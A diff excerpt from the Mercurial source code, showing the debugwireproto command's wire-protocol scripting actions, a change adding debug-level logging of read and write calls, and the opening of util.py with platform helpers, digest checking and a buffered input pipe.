2662 2662 Arguments to the command are defined as lines in this block. The format of
2663 2663 each line is ``<key> <value>``. e.g.::
2664 2664
2665 2665 command listkeys
2666 2666 namespace bookmarks
2667 2667
2668 2668 Values are interpreted as Python b'' literals. This allows encoding
2669 2669 special byte sequences via backslash escaping.
2670 2670
2671 2671 The following arguments have special meaning:
2672 2672
2673 2673 ``PUSHFILE``
2674 2674 When defined, the *push* mechanism of the peer will be used instead
2675 2675 of the static request-response mechanism and the content of the
2676 2676 file specified in the value of this argument will be sent as the
2677 2677 command payload.
2678 2678
2679 2679 This can be used to submit a local bundle file to the remote.
2680 2680
2681 2681 batchbegin
2682 2682 ----------
2683 2683
2684 2684 Instruct the peer to begin a batched send.
2685 2685
2686 2686 All ``command`` blocks are queued for execution until the next
2687 2687 ``batchsubmit`` block.
2688 2688
2689 2689 batchsubmit
2690 2690 -----------
2691 2691
2692 2692 Submit previously queued ``command`` blocks as a batch request.
2693 2693
2694 2694 This action MUST be paired with a ``batchbegin`` action.
2695 2695
2696 2696 httprequest <method> <path>
2697 2697 ---------------------------
2698 2698
2699 2699 (HTTP peer only)
2700 2700
2701 2701 Send an HTTP request to the peer.
2702 2702
2703 2703 The HTTP request line follows the ``httprequest`` action. e.g. ``GET /foo``.
2704 2704
2705 2705 Arguments of the form ``<key>: <value>`` are interpreted as HTTP request
2706 2706 headers to add to the request. e.g. ``Accept: foo``.
2707 2707
2708 2708 The following arguments are special:
2709 2709
2710 2710 ``BODYFILE``
2711 2711 The content of the file defined as the value to this argument will be
2712 2712 transferred verbatim as the HTTP request body.
2713 2713
2714 2714 close
2715 2715 -----
2716 2716
2717 2717 Close the connection to the server.
2718 2718
2719 2719 flush
2720 2720 -----
2721 2721
2722 2722 Flush data written to the server.
2723 2723
2724 2724 readavailable
2725 2725 -------------
2726 2726
2727 2727 Close the write end of the connection and read all available data from
2728 2728 the server.
2729 2729
2730 2730 If the connection to the server encompasses multiple pipes, we poll both
2731 2731 pipes and read available data.
2732 2732
2733 2733 readline
2734 2734 --------
2735 2735
2736 2736 Read a line of output from the server. If there are multiple output
2737 2737 pipes, reads only the main pipe.
2738 2738
2739 2739 ereadline
2740 2740 ---------
2741 2741
2742 2742 Like ``readline``, but read from the stderr pipe, if available.
2743 2743
2744 2744 read <X>
2745 2745 --------
2746 2746
2747 2747 ``read()`` X bytes from the server's main output pipe.
2748 2748
2749 2749 eread <X>
2750 2750 ---------
2751 2751
2752 2752 ``read()`` X bytes from the server's stderr pipe, if available.
2753 2753 """
2754 2754 opts = pycompat.byteskwargs(opts)
2755 2755
2756 2756 if opts['localssh'] and not repo:
2757 2757 raise error.Abort(_('--localssh requires a repository'))
2758 2758
2759 2759 if opts['peer'] and opts['peer'] not in ('raw', 'ssh1', 'ssh2'):
2760 2760 raise error.Abort(_('invalid value for --peer'),
2761 2761 hint=_('valid values are "raw", "ssh1", and "ssh2"'))
2762 2762
2763 2763 if path and opts['localssh']:
2764 2764 raise error.Abort(_('cannot specify --localssh with an explicit '
2765 2765 'path'))
2766 2766
2767 2767 if ui.interactive():
2768 2768 ui.write(_('(waiting for commands on stdin)\n'))
2769 2769
2770 2770 blocks = list(_parsewirelangblocks(ui.fin))
2771 2771
2772 2772 proc = None
2773 2773 stdin = None
2774 2774 stdout = None
2775 2775 stderr = None
2776 2776 opener = None
2777 2777
2778 2778 if opts['localssh']:
2779 2779 # We start the SSH server in its own process so there is process
2780 2780 # separation. This prevents a whole class of potential bugs around
2781 2781 # shared state from interfering with server operation.
2782 2782 args = util.hgcmd() + [
2783 2783 '-R', repo.root,
2784 2784 'debugserve', '--sshstdio',
2785 2785 ]
2786 2786 proc = subprocess.Popen(args, stdin=subprocess.PIPE,
2787 2787 stdout=subprocess.PIPE, stderr=subprocess.PIPE,
2788 2788 bufsize=0)
2789 2789
2790 2790 stdin = proc.stdin
2791 2791 stdout = proc.stdout
2792 2792 stderr = proc.stderr
2793 2793
2794 2794 # We turn the pipes into observers so we can log I/O.
2795 2795 if ui.verbose or opts['peer'] == 'raw':
2796 2796 stdin = util.makeloggingfileobject(ui, proc.stdin, b'i',
2797 2797 logdata=True)
2798 2798 stdout = util.makeloggingfileobject(ui, proc.stdout, b'o',
2799 2799 logdata=True)
2800 2800 stderr = util.makeloggingfileobject(ui, proc.stderr, b'e',
2801 2801 logdata=True)
2802 2802
2803 2803 # --localssh also implies the peer connection settings.
2804 2804
2805 2805 url = 'ssh://localserver'
2806 2806 autoreadstderr = not opts['noreadstderr']
2807 2807
2808 2808 if opts['peer'] == 'ssh1':
2809 2809 ui.write(_('creating ssh peer for wire protocol version 1\n'))
2810 2810 peer = sshpeer.sshv1peer(ui, url, proc, stdin, stdout, stderr,
2811 2811 None, autoreadstderr=autoreadstderr)
2812 2812 elif opts['peer'] == 'ssh2':
2813 2813 ui.write(_('creating ssh peer for wire protocol version 2\n'))
2814 2814 peer = sshpeer.sshv2peer(ui, url, proc, stdin, stdout, stderr,
2815 2815 None, autoreadstderr=autoreadstderr)
2816 2816 elif opts['peer'] == 'raw':
2817 2817 ui.write(_('using raw connection to peer\n'))
2818 2818 peer = None
2819 2819 else:
2820 2820 ui.write(_('creating ssh peer from handshake results\n'))
2821 2821 peer = sshpeer.makepeer(ui, url, proc, stdin, stdout, stderr,
2822 2822 autoreadstderr=autoreadstderr)
2823 2823
2824 2824 elif path:
2825 2825 # We bypass hg.peer() so we can proxy the sockets.
2826 2826 # TODO consider not doing this because we skip
2827 2827 # ``hg.wirepeersetupfuncs`` and potentially other useful functionality.
2828 2828 u = util.url(path)
2829 2829 if u.scheme != 'http':
2830 2830 raise error.Abort(_('only http:// paths are currently supported'))
2831 2831
2832 2832 url, authinfo = u.authinfo()
2833 2833 openerargs = {}
2834 2834
2835 2835 # Turn pipes/sockets into observers so we can log I/O.
2836 2836 if ui.verbose:
2837 2837 openerargs = {
2838 2838 r'loggingfh': ui,
2839 2839 r'loggingname': b's',
2840 2840 r'loggingopts': {
2841 2841 r'logdata': True,
2842 r'logdataapis': False,
2842 2843 },
2843 2844 }
2844 2845
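        # Low-level read()/write() API calls are noisy, so only log them
        # when --debug is in effect; --verbose still logs the transferred
        # data itself via logdata above.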
2846 if ui.debugflag:
2847 openerargs[r'loggingopts'][r'logdataapis'] = True
2848
2845 2849 opener = urlmod.opener(ui, authinfo, **openerargs)
2846 2850
2847 2851 if opts['peer'] == 'raw':
2848 2852 ui.write(_('using raw connection to peer\n'))
2849 2853 peer = None
2850 2854 elif opts['peer']:
2851 2855 raise error.Abort(_('--peer %s not supported with HTTP peers') %
2852 2856 opts['peer'])
2853 2857 else:
2854 2858 peer = httppeer.httppeer(ui, path, url, opener)
2855 2859 peer._fetchcaps()
2856 2860
2857 2861 # We /could/ populate stdin/stdout with sock.makefile()...
2858 2862 else:
2859 2863 raise error.Abort(_('unsupported connection configuration'))
2860 2864
2861 2865 batchedcommands = None
2862 2866
2863 2867 # Now perform actions based on the parsed wire language instructions.
2864 2868 for action, lines in blocks:
2865 2869 if action in ('raw', 'raw+'):
2866 2870 if not stdin:
2867 2871 raise error.Abort(_('cannot call raw/raw+ on this peer'))
2868 2872
2869 2873 # Concatenate the data together.
2870 2874 data = ''.join(l.lstrip() for l in lines)
2871 2875 data = util.unescapestr(data)
2872 2876 stdin.write(data)
2873 2877
2874 2878 if action == 'raw+':
2875 2879 stdin.flush()
2876 2880 elif action == 'flush':
2877 2881 if not stdin:
2878 2882 raise error.Abort(_('cannot call flush on this peer'))
2879 2883 stdin.flush()
2880 2884 elif action.startswith('command'):
2881 2885 if not peer:
2882 2886 raise error.Abort(_('cannot send commands unless peer instance '
2883 2887 'is available'))
2884 2888
2885 2889 command = action.split(' ', 1)[1]
2886 2890
2887 2891 args = {}
2888 2892 for line in lines:
2889 2893 # We need to allow empty values.
2890 2894 fields = line.lstrip().split(' ', 1)
2891 2895 if len(fields) == 1:
2892 2896 key = fields[0]
2893 2897 value = ''
2894 2898 else:
2895 2899 key, value = fields
2896 2900
2897 2901 args[key] = util.unescapestr(value)
2898 2902
2899 2903 if batchedcommands is not None:
2900 2904 batchedcommands.append((command, args))
2901 2905 continue
2902 2906
2903 2907 ui.status(_('sending %s command\n') % command)
2904 2908
2905 2909 if 'PUSHFILE' in args:
2906 2910 with open(args['PUSHFILE'], r'rb') as fh:
2907 2911 del args['PUSHFILE']
2908 2912 res, output = peer._callpush(command, fh,
2909 2913 **pycompat.strkwargs(args))
2910 2914 ui.status(_('result: %s\n') % util.escapedata(res))
2911 2915 ui.status(_('remote output: %s\n') %
2912 2916 util.escapedata(output))
2913 2917 else:
2914 2918 res = peer._call(command, **pycompat.strkwargs(args))
2915 2919 ui.status(_('response: %s\n') % util.escapedata(res))
2916 2920
2917 2921 elif action == 'batchbegin':
2918 2922 if batchedcommands is not None:
2919 2923 raise error.Abort(_('nested batchbegin not allowed'))
2920 2924
2921 2925 batchedcommands = []
2922 2926 elif action == 'batchsubmit':
2923 2927 # There is a batching API we could go through. But it would be
2924 2928 # difficult to normalize requests into function calls. It is easier
2925 2929 # to bypass this layer and normalize to commands + args.
2926 2930 ui.status(_('sending batch with %d sub-commands\n') %
2927 2931 len(batchedcommands))
2928 2932 for i, chunk in enumerate(peer._submitbatch(batchedcommands)):
2929 2933 ui.status(_('response #%d: %s\n') % (i, util.escapedata(chunk)))
2930 2934
2931 2935 batchedcommands = None
2932 2936
2933 2937 elif action.startswith('httprequest '):
2934 2938 if not opener:
2935 2939 raise error.Abort(_('cannot use httprequest without an HTTP '
2936 2940 'peer'))
2937 2941
2938 2942 request = action.split(' ', 2)
2939 2943 if len(request) != 3:
2940 2944 raise error.Abort(_('invalid httprequest: expected format is '
2941 2945 '"httprequest <method> <path>'))
2942 2946
2943 2947 method, httppath = request[1:]
2944 2948 headers = {}
2945 2949 body = None
2946 2950 for line in lines:
2947 2951 line = line.lstrip()
2948 2952 m = re.match(b'^([a-zA-Z0-9_-]+): (.*)$', line)
2949 2953 if m:
2950 2954 headers[m.group(1)] = m.group(2)
2951 2955 continue
2952 2956
2953 2957 if line.startswith(b'BODYFILE '):
2954 2958 with open(line.split(b' ', 1)[1], 'rb') as fh:
2955 2959 body = fh.read()
2956 2960 else:
2957 2961 raise error.Abort(_('unknown argument to httprequest: %s') %
2958 2962 line)
2959 2963
2960 2964 url = path + httppath
2961 2965 req = urlmod.urlreq.request(pycompat.strurl(url), body, headers)
2962 2966
2963 2967 try:
2964 2968 opener.open(req).read()
2965 2969 except util.urlerr.urlerror as e:
2966 2970 e.read()
2967 2971
2968 2972 elif action == 'close':
2969 2973 peer.close()
2970 2974 elif action == 'readavailable':
2971 2975 if not stdout or not stderr:
2972 2976 raise error.Abort(_('readavailable not available on this peer'))
2973 2977
2974 2978 stdin.close()
2975 2979 stdout.read()
2976 2980 stderr.read()
2977 2981
2978 2982 elif action == 'readline':
2979 2983 if not stdout:
2980 2984 raise error.Abort(_('readline not available on this peer'))
2981 2985 stdout.readline()
2982 2986 elif action == 'ereadline':
2983 2987 if not stderr:
2984 2988 raise error.Abort(_('ereadline not available on this peer'))
2985 2989 stderr.readline()
2986 2990 elif action.startswith('read '):
2987 2991 count = int(action.split(' ', 1)[1])
2988 2992 if not stdout:
2989 2993 raise error.Abort(_('read not available on this peer'))
2990 2994 stdout.read(count)
2991 2995 elif action.startswith('eread '):
2992 2996 count = int(action.split(' ', 1)[1])
2993 2997 if not stderr:
2994 2998 raise error.Abort(_('eread not available on this peer'))
2995 2999 stderr.read(count)
2996 3000 else:
2997 3001 raise error.Abort(_('unknown action: %s') % action)
2998 3002
2999 3003 if batchedcommands is not None:
3000 3004 raise error.Abort(_('unclosed "batchbegin" request'))
3001 3005
3002 3006 if peer:
3003 3007 peer.close()
3004 3008
3005 3009 if proc:
3006 3010 proc.kill()
@@ -1,4324 +1,4365 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import codecs
21 21 import collections
22 22 import contextlib
23 23 import errno
24 24 import gc
25 25 import hashlib
26 26 import imp
27 27 import io
28 28 import itertools
29 29 import mmap
30 30 import os
31 31 import platform as pyplatform
32 32 import re as remod
33 33 import shutil
34 34 import signal
35 35 import socket
36 36 import stat
37 37 import string
38 38 import subprocess
39 39 import sys
40 40 import tempfile
41 41 import textwrap
42 42 import time
43 43 import traceback
44 44 import warnings
45 45 import zlib
46 46
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 node as nodemod,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56 from .utils import dateutil
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 empty = pycompat.empty
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 queue = pycompat.queue
70 70 socketserver = pycompat.socketserver
71 71 stderr = pycompat.stderr
72 72 stdin = pycompat.stdin
73 73 stdout = pycompat.stdout
74 74 bytesio = pycompat.bytesio
75 75 # TODO deprecate stringio name, as it is a lie on Python 3.
76 76 stringio = bytesio
77 77 xmlrpclib = pycompat.xmlrpclib
78 78
79 79 httpserver = urllibcompat.httpserver
80 80 urlerr = urllibcompat.urlerr
81 81 urlreq = urllibcompat.urlreq
82 82
83 83 # workaround for win32mbcs
84 84 _filenamebytestr = pycompat.bytestr
85 85
86 86 def isatty(fp):
87 87 try:
88 88 return fp.isatty()
89 89 except AttributeError:
90 90 return False
91 91
92 92 # glibc determines buffering on first write to stdout - if we replace a TTY
93 93 # destined stdout with a pipe destined stdout (e.g. pager), we want line
94 94 # buffering
95 95 if isatty(stdout):
96 96 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
97 97
98 98 if pycompat.iswindows:
99 99 from . import windows as platform
100 100 stdout = platform.winstdout(stdout)
101 101 else:
102 102 from . import posix as platform
103 103
104 104 _ = i18n._
105 105
106 106 bindunixsocket = platform.bindunixsocket
107 107 cachestat = platform.cachestat
108 108 checkexec = platform.checkexec
109 109 checklink = platform.checklink
110 110 copymode = platform.copymode
111 111 executablepath = platform.executablepath
112 112 expandglobs = platform.expandglobs
113 113 explainexit = platform.explainexit
114 114 findexe = platform.findexe
115 115 getfsmountpoint = platform.getfsmountpoint
116 116 getfstype = platform.getfstype
117 117 gethgcmd = platform.gethgcmd
118 118 getuser = platform.getuser
119 119 getpid = os.getpid
120 120 groupmembers = platform.groupmembers
121 121 groupname = platform.groupname
122 122 hidewindow = platform.hidewindow
123 123 isexec = platform.isexec
124 124 isowner = platform.isowner
125 125 listdir = osutil.listdir
126 126 localpath = platform.localpath
127 127 lookupreg = platform.lookupreg
128 128 makedir = platform.makedir
129 129 nlinks = platform.nlinks
130 130 normpath = platform.normpath
131 131 normcase = platform.normcase
132 132 normcasespec = platform.normcasespec
133 133 normcasefallback = platform.normcasefallback
134 134 openhardlinks = platform.openhardlinks
135 135 oslink = platform.oslink
136 136 parsepatchoutput = platform.parsepatchoutput
137 137 pconvert = platform.pconvert
138 138 poll = platform.poll
139 139 popen = platform.popen
140 140 posixfile = platform.posixfile
141 141 quotecommand = platform.quotecommand
142 142 readpipe = platform.readpipe
143 143 rename = platform.rename
144 144 removedirs = platform.removedirs
145 145 samedevice = platform.samedevice
146 146 samefile = platform.samefile
147 147 samestat = platform.samestat
148 148 setbinary = platform.setbinary
149 149 setflags = platform.setflags
150 150 setsignalhandler = platform.setsignalhandler
151 151 shellquote = platform.shellquote
152 152 shellsplit = platform.shellsplit
153 153 spawndetached = platform.spawndetached
154 154 split = platform.split
155 155 sshargs = platform.sshargs
156 156 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
157 157 statisexec = platform.statisexec
158 158 statislink = platform.statislink
159 159 testpid = platform.testpid
160 160 umask = platform.umask
161 161 unlink = platform.unlink
162 162 username = platform.username
163 163
164 164 try:
165 165 recvfds = osutil.recvfds
166 166 except AttributeError:
167 167 pass
168 168 try:
169 169 setprocname = osutil.setprocname
170 170 except AttributeError:
171 171 pass
172 172 try:
173 173 unblocksignal = osutil.unblocksignal
174 174 except AttributeError:
175 175 pass
176 176
177 177 # Python compatibility
178 178
179 179 _notset = object()
180 180
181 181 def safehasattr(thing, attr):
182 182 return getattr(thing, attr, _notset) is not _notset
183 183
184 184 def _rapply(f, xs):
185 185 if xs is None:
186 186 # assume None means non-value of optional data
187 187 return xs
188 188 if isinstance(xs, (list, set, tuple)):
189 189 return type(xs)(_rapply(f, x) for x in xs)
190 190 if isinstance(xs, dict):
191 191 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
192 192 return f(xs)
193 193
194 194 def rapply(f, xs):
195 195 """Apply function recursively to every item preserving the data structure
196 196
197 197 >>> def f(x):
198 198 ... return 'f(%s)' % x
199 199 >>> rapply(f, None) is None
200 200 True
201 201 >>> rapply(f, 'a')
202 202 'f(a)'
203 203 >>> rapply(f, {'a'}) == {'f(a)'}
204 204 True
205 205 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
206 206 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
207 207
208 208 >>> xs = [object()]
209 209 >>> rapply(pycompat.identity, xs) is xs
210 210 True
211 211 """
212 212 if f is pycompat.identity:
213 213 # fast path mainly for py2
214 214 return xs
215 215 return _rapply(f, xs)
216 216
217 217 def bitsfrom(container):
218 218 bits = 0
219 219 for bit in container:
220 220 bits |= bit
221 221 return bits
222 222
223 223 # Python 2.6 still has deprecation warnings enabled by default. We do not
224 224 # want to display anything to standard users, so detect if we are running
225 225 # tests and only use Python deprecation warnings in this case.
226 226 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
227 227 if _dowarn:
228 228 # explicitly unfilter our warning for python 2.7
229 229 #
230 230 # The option of setting PYTHONWARNINGS in the test runner was investigated.
231 231 # However, module name set through PYTHONWARNINGS was exactly matched, so
232 232 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
233 233 # makes the whole PYTHONWARNINGS thing useless for our usecase.
234 234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
235 235 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
236 236 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
237 237 if _dowarn and pycompat.ispy3:
238 238 # silence warning emitted by passing user string to re.sub()
239 239 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
240 240 r'mercurial')
241 241 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
242 242 DeprecationWarning, r'mercurial')
243 243
244 244 def nouideprecwarn(msg, version, stacklevel=1):
245 245 """Issue an python native deprecation warning
246 246
247 247 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
248 248 """
249 249 if _dowarn:
250 250 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
251 251 " update your code.)") % version
252 252 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
253 253
254 254 DIGESTS = {
255 255 'md5': hashlib.md5,
256 256 'sha1': hashlib.sha1,
257 257 'sha512': hashlib.sha512,
258 258 }
259 259 # List of digest types from strongest to weakest
260 260 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
261 261
262 262 for k in DIGESTS_BY_STRENGTH:
263 263 assert k in DIGESTS
264 264
265 265 class digester(object):
266 266 """helper to compute digests.
267 267
268 268 This helper can be used to compute one or more digests given their name.
269 269
270 270 >>> d = digester([b'md5', b'sha1'])
271 271 >>> d.update(b'foo')
272 272 >>> [k for k in sorted(d)]
273 273 ['md5', 'sha1']
274 274 >>> d[b'md5']
275 275 'acbd18db4cc2f85cedef654fccc4a4d8'
276 276 >>> d[b'sha1']
277 277 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
278 278 >>> digester.preferred([b'md5', b'sha1'])
279 279 'sha1'
280 280 """
281 281
282 282 def __init__(self, digests, s=''):
283 283 self._hashes = {}
284 284 for k in digests:
285 285 if k not in DIGESTS:
286 286 raise Abort(_('unknown digest type: %s') % k)
287 287 self._hashes[k] = DIGESTS[k]()
288 288 if s:
289 289 self.update(s)
290 290
291 291 def update(self, data):
292 292 for h in self._hashes.values():
293 293 h.update(data)
294 294
295 295 def __getitem__(self, key):
296 296 if key not in DIGESTS:
297 297 raise Abort(_('unknown digest type: %s') % key)
298 298 return nodemod.hex(self._hashes[key].digest())
299 299
300 300 def __iter__(self):
301 301 return iter(self._hashes)
302 302
303 303 @staticmethod
304 304 def preferred(supported):
305 305 """returns the strongest digest type in both supported and DIGESTS."""
306 306
307 307 for k in DIGESTS_BY_STRENGTH:
308 308 if k in supported:
309 309 return k
310 310 return None
311 311
312 312 class digestchecker(object):
313 313 """file handle wrapper that additionally checks content against a given
314 314 size and digests.
315 315
316 316 d = digestchecker(fh, size, {'md5': '...'})
317 317
318 318 When multiple digests are given, all of them are validated.
319 319 """
320 320
321 321 def __init__(self, fh, size, digests):
322 322 self._fh = fh
323 323 self._size = size
324 324 self._got = 0
325 325 self._digests = dict(digests)
326 326 self._digester = digester(self._digests.keys())
327 327
328 328 def read(self, length=-1):
329 329 content = self._fh.read(length)
330 330 self._digester.update(content)
331 331 self._got += len(content)
332 332 return content
333 333
334 334 def validate(self):
335 335 if self._size != self._got:
336 336 raise Abort(_('size mismatch: expected %d, got %d') %
337 337 (self._size, self._got))
338 338 for k, v in self._digests.items():
339 339 if v != self._digester[k]:
340 340 # i18n: first parameter is a digest name
341 341 raise Abort(_('%s mismatch: expected %s, got %s') %
342 342 (k, v, self._digester[k]))
343 343
344 344 try:
345 345 buffer = buffer
346 346 except NameError:
347 347 def buffer(sliceable, offset=0, length=None):
348 348 if length is not None:
349 349 return memoryview(sliceable)[offset:offset + length]
350 350 return memoryview(sliceable)[offset:]
351 351
352 352 closefds = pycompat.isposix
353 353
354 354 _chunksize = 4096
355 355
356 356 class bufferedinputpipe(object):
357 357 """a manually buffered input pipe
358 358
359 359 Python will not let us use buffered IO and lazy reading with 'polling' at
360 360 the same time. We cannot probe the buffer state and select will not detect
361 361 that data are ready to read if they are already buffered.
362 362
363 363 This class lets us work around that by implementing its own buffering
364 364 (allowing efficient readline) while exposing whether the buffer is
365 365 empty (allowing the buffer to cooperate with polling).
366 366
367 367 This class lives in the 'util' module because it makes use of the 'os'
368 368 module from the python stdlib.
369 369 """
370 370 def __new__(cls, fh):
371 371 # If we receive a fileobjectproxy, we need to use a variation of this
372 372 # class that notifies observers about activity.
373 373 if isinstance(fh, fileobjectproxy):
374 374 cls = observedbufferedinputpipe
375 375
376 376 return super(bufferedinputpipe, cls).__new__(cls)
377 377
378 378 def __init__(self, input):
379 379 self._input = input
380 380 self._buffer = []
381 381 self._eof = False
382 382 self._lenbuf = 0
383 383
384 384 @property
385 385 def hasbuffer(self):
386 386 """True is any data is currently buffered
387 387
388 388 This will be used externally a pre-step for polling IO. If there is
389 389 already data then no polling should be set in place."""
390 390 return bool(self._buffer)
391 391
392 392 @property
393 393 def closed(self):
394 394 return self._input.closed
395 395
396 396 def fileno(self):
397 397 return self._input.fileno()
398 398
399 399 def close(self):
400 400 return self._input.close()
401 401
402 402 def read(self, size):
403 403 while (not self._eof) and (self._lenbuf < size):
404 404 self._fillbuffer()
405 405 return self._frombuffer(size)
406 406
407 407 def readline(self, *args, **kwargs):
408 408 if 1 < len(self._buffer):
409 409 # this should not happen because both read and readline end with a
410 410 # _frombuffer call that collapses it.
411 411 self._buffer = [''.join(self._buffer)]
412 412 self._lenbuf = len(self._buffer[0])
413 413 lfi = -1
414 414 if self._buffer:
415 415 lfi = self._buffer[-1].find('\n')
416 416 while (not self._eof) and lfi < 0:
417 417 self._fillbuffer()
418 418 if self._buffer:
419 419 lfi = self._buffer[-1].find('\n')
420 420 size = lfi + 1
421 421 if lfi < 0: # end of file
422 422 size = self._lenbuf
423 423 elif 1 < len(self._buffer):
424 424 # we need to take previous chunks into account
425 425 size += self._lenbuf - len(self._buffer[-1])
426 426 return self._frombuffer(size)
427 427
428 428 def _frombuffer(self, size):
429 429 """return at most 'size' data from the buffer
430 430
431 431 The data are removed from the buffer."""
432 432 if size == 0 or not self._buffer:
433 433 return ''
434 434 buf = self._buffer[0]
435 435 if 1 < len(self._buffer):
436 436 buf = ''.join(self._buffer)
437 437
438 438 data = buf[:size]
439 439 buf = buf[len(data):]
440 440 if buf:
441 441 self._buffer = [buf]
442 442 self._lenbuf = len(buf)
443 443 else:
444 444 self._buffer = []
445 445 self._lenbuf = 0
446 446 return data
447 447
448 448 def _fillbuffer(self):
449 449 """read data to the buffer"""
450 450 data = os.read(self._input.fileno(), _chunksize)
451 451 if not data:
452 452 self._eof = True
453 453 else:
454 454 self._lenbuf += len(data)
455 455 self._buffer.append(data)
456 456
457 457 return data
458 458
459 459 def mmapread(fp):
460 460 try:
461 461 fd = getattr(fp, 'fileno', lambda: fp)()
462 462 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
463 463 except ValueError:
464 464 # Empty files cannot be mmapped, but mmapread should still work. Check
465 465 # if the file is empty, and if so, return an empty buffer.
466 466 if os.fstat(fd).st_size == 0:
467 467 return ''
468 468 raise
469 469
470 470 def popen2(cmd, env=None, newlines=False):
471 471 # Setting bufsize to -1 lets the system decide the buffer size.
472 472 # The default for bufsize is 0, meaning unbuffered. This leads to
473 473 # poor performance on Mac OS X: http://bugs.python.org/issue4194
474 474 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
475 475 close_fds=closefds,
476 476 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
477 477 universal_newlines=newlines,
478 478 env=env)
479 479 return p.stdin, p.stdout
480 480
481 481 def popen3(cmd, env=None, newlines=False):
482 482 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
483 483 return stdin, stdout, stderr
484 484
485 485 def popen4(cmd, env=None, newlines=False, bufsize=-1):
486 486 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
487 487 close_fds=closefds,
488 488 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
489 489 stderr=subprocess.PIPE,
490 490 universal_newlines=newlines,
491 491 env=env)
492 492 return p.stdin, p.stdout, p.stderr, p
493 493
494 494 class fileobjectproxy(object):
495 495 """A proxy around file objects that tells a watcher when events occur.
496 496
497 497 This type is intended to only be used for testing purposes. Think hard
498 498 before using it in important code.
499 499 """
500 500 __slots__ = (
501 501 r'_orig',
502 502 r'_observer',
503 503 )
504 504
505 505 def __init__(self, fh, observer):
506 506 object.__setattr__(self, r'_orig', fh)
507 507 object.__setattr__(self, r'_observer', observer)
508 508
509 509 def __getattribute__(self, name):
510 510 ours = {
511 511 r'_observer',
512 512
513 513 # IOBase
514 514 r'close',
515 515 # closed if a property
516 516 r'fileno',
517 517 r'flush',
518 518 r'isatty',
519 519 r'readable',
520 520 r'readline',
521 521 r'readlines',
522 522 r'seek',
523 523 r'seekable',
524 524 r'tell',
525 525 r'truncate',
526 526 r'writable',
527 527 r'writelines',
528 528 # RawIOBase
529 529 r'read',
530 530 r'readall',
531 531 r'readinto',
532 532 r'write',
533 533 # BufferedIOBase
534 534 # raw is a property
535 535 r'detach',
536 536 # read defined above
537 537 r'read1',
538 538 # readinto defined above
539 539 # write defined above
540 540 }
541 541
542 542 # We only observe some methods.
543 543 if name in ours:
544 544 return object.__getattribute__(self, name)
545 545
546 546 return getattr(object.__getattribute__(self, r'_orig'), name)
547 547
548 548 def __nonzero__(self):
549 549 return bool(object.__getattribute__(self, r'_orig'))
550 550
551 551 __bool__ = __nonzero__
552 552
553 553 def __delattr__(self, name):
554 554 return delattr(object.__getattribute__(self, r'_orig'), name)
555 555
556 556 def __setattr__(self, name, value):
557 557 return setattr(object.__getattribute__(self, r'_orig'), name, value)
558 558
559 559 def __iter__(self):
560 560 return object.__getattribute__(self, r'_orig').__iter__()
561 561
562 562 def _observedcall(self, name, *args, **kwargs):
563 563 # Call the original object.
564 564 orig = object.__getattribute__(self, r'_orig')
565 565 res = getattr(orig, name)(*args, **kwargs)
566 566
567 567 # Call a method on the observer of the same name with arguments
568 568 # so it can react, log, etc.
569 569 observer = object.__getattribute__(self, r'_observer')
570 570 fn = getattr(observer, name, None)
571 571 if fn:
572 572 fn(res, *args, **kwargs)
573 573
574 574 return res
575 575
576 576 def close(self, *args, **kwargs):
577 577 return object.__getattribute__(self, r'_observedcall')(
578 578 r'close', *args, **kwargs)
579 579
580 580 def fileno(self, *args, **kwargs):
581 581 return object.__getattribute__(self, r'_observedcall')(
582 582 r'fileno', *args, **kwargs)
583 583
584 584 def flush(self, *args, **kwargs):
585 585 return object.__getattribute__(self, r'_observedcall')(
586 586 r'flush', *args, **kwargs)
587 587
588 588 def isatty(self, *args, **kwargs):
589 589 return object.__getattribute__(self, r'_observedcall')(
590 590 r'isatty', *args, **kwargs)
591 591
592 592 def readable(self, *args, **kwargs):
593 593 return object.__getattribute__(self, r'_observedcall')(
594 594 r'readable', *args, **kwargs)
595 595
596 596 def readline(self, *args, **kwargs):
597 597 return object.__getattribute__(self, r'_observedcall')(
598 598 r'readline', *args, **kwargs)
599 599
600 600 def readlines(self, *args, **kwargs):
